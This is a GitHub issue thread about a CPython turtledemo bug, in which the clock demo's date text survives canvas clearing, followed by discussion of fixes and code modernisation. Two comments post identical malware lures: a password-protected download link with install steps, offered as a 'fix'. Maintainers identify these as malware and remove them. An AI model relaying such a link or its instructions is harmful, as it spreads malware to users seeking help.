### ISSUE TITLE
The canvas cannot be cleared after running turtledemo clock

### ISSUE THREAD

**Issue by Wulian233** [python/cpython#123370]
# Bug report

### Bug description:

**First, run turtledemo clock. Then stop**

<img width="710" alt="2024-08-27 095034" src="https://github.com/user-attachments/assets/4dbe25e9-cbda-4d3d-be9e-ede39ed2af03">

When the clock stops running, the date appears, and the clear button becomes unusable. After switching to other files, the date still remains visible. Even after other files finish, pressing the clear button still cannot clear the date, but it can clear the drawings of the current file.
<img width="710" alt="2024-08-27 095211" src="https://github.com/user-attachments/assets/95df1a10-8124-4816-b4b7-fdce3a58b722">

### Linked PRs
* gh-123457
* gh-125653
* gh-125656

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Wulian233** [comment]
@picnixz Here it is happening again, could you delete it? Yesterday I contacted one of the people who sent the message, and it was confirmed to be a computer virus.
![IMG_20240827_101029_compressed_1724724640474.jpg](https://github.com/user-attachments/assets/55dd99e3-dd27-4224-8ae4-886b0dc55dc5)


I think this place has been hacked. There have been spam or viruses appearing recently.

https://github.com/python/cpython/issues/123328

https://github.com/python/cpython/issues/123357

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Wulian233** [comment]
By the way, the 5 people yesterday and the 2 people here are all from China. So I can contact them

**Comment by hugovk** [comment]
GitHub is under a huge malware posting attack. Don't click the links or install anything from them, and I wouldn't waste time contacting the spammers. You can report the accounts to GitHub.

I've deleted the comments.

@python/organization-owners Please can you block the two accounts above?

**Comment by hugovk** [comment]
I reported these two and GitHub replied in 20 min to delete the jia6214876 account.

(They took a month for my last one.)

**Comment by terryjreedy** [comment]
I'd like either the spam discussion deleted or the meat (opening post and below moved to a new issue and deleted here.
---
I am likely the current core dev with most turtledemo knowledge.  Both clock and nim use `(t:=Turtle()).write('text')` between `tracer(False)` and `tracer(True)` after t.clear() to remove previous writes.  Colormixer also uses a one-time `t.write(s)` without touching tracer. After a couple of experiments, I still do not know why the screen reset and clear on restarts and loads does not work.  A possible next move is to minimize clock until the ghost disappears.

**Comment by Wulian233** [comment]
I deleted my own comment, leaving hugovk's. I tried to solve this problem, including joining at [stopIt](https://github.com/python/cpython/blob/main/Lib/turtledemo/__main__.py#L383-L388) func
```python
self.screen.clear()
self.canvas.update()
self.canvas.delete("all") 
```
But all didn't work. I guess this bug has to do with `write`

**Comment by Wulian233** [comment]
I submitted a PR yesterday, but I noticed that the turtledemo did not set the codeowner to review the request. Could Terry take a review please, Thanks!

**Comment by terryjreedy** [comment]
I just added self as turtledemo codeowner.  I'd like to see a follow-up 'modernize PR to

1. Replace module docstring with "turtledemo/clock.py -- clock program showing time and date."  File name is wrong and instruction only applies when run in turtledemo, which it is redundant.

2. Replace German parameter names: 
distanz, winkel = distance, angle
laenge, spitze = length, tip
'tip' is length of side of equilateral tip triangle; would consider another pair.

3. In 'def hand', replace divisor in 'tip/2.0' with maybe 3.0 so just isosceles but not equilateral.  What looks good to you?

Or new issue to also modernize this and other files with 1. obsolete and bloated docstrings and 2. German names and comments.

Note that tearing off Examples menu makes it easy to look through files quickly.

**Comment by Wulian233** [comment]
> 1. Replace module docstring with "turtledemo/clock.py -- clock program showing time and date."  File name is wrong and instruction only applies when run in turtledemo, which it is redundant.

This problem is present in every file and can be changed in the new PR

> 2. Replace German parameter names:
>    distanz, winkel = distance, angle
>    laenge, spitze = length, tip
>    'tip' is length of side of equilateral tip triangle; would consider another pair.

I've replaced this

> 3. In 'def hand', replace divisor in 'tip/2.0' with maybe 3.0 so just isosceles but not equilateral.  What looks good to you?
<img width="473" alt="屏幕截图 2024-08-31 103752" src="https://github.com/user-attachments/assets/de492364-ecc6-4bd0-b91c-3020001fc385">
I think it's uglier :(

> Or new issue to also modernize this and other files with 1. obsolete and bloated docstrings and 2. German names and comments.

Agree

**Comment by terryjreedy** [comment]
For suggestion 3, I forgot that changing the base length requires increasing the base angles and decreasing the tip angle (and changing the turns the opposite amount) so that the 2 half bases meet and the stem is still a single line.

5. Use English local names.  Since these are invisible to users, this can be done even if parameter names are left alone.  Example: add `distance, angle = distanz, winkel` at the top of `jump` and modifying the rest of the body.  Add `stem, tip = laenge, spitze` in `hand` and `make_hand_shape`.   `tick()` has no parameters and the German local names can simply be changed.

6. `jump` is called 4 times, each with 1 argument.  winkel/angle always defaults to 0, making the turns no-ops.  If the remaining code were inlined, I believe some of the pen up/downs would no be needed.  The resulting code might be clearer.

Before closing, I will open at least 2 new issues for changes that I think can and should be backported, with justifications.

**Comment by Wulian233** [comment]
> 5. Use English local names.  Since these are invisible to users, this can be done even if parameter names are left alone.  

In this related PR, I ultimately decided to only fix this bug. However, on the left side of the turtledemo, users can see the code for the example case, so I don't want to add complexity and should try to keep it as simple as possible
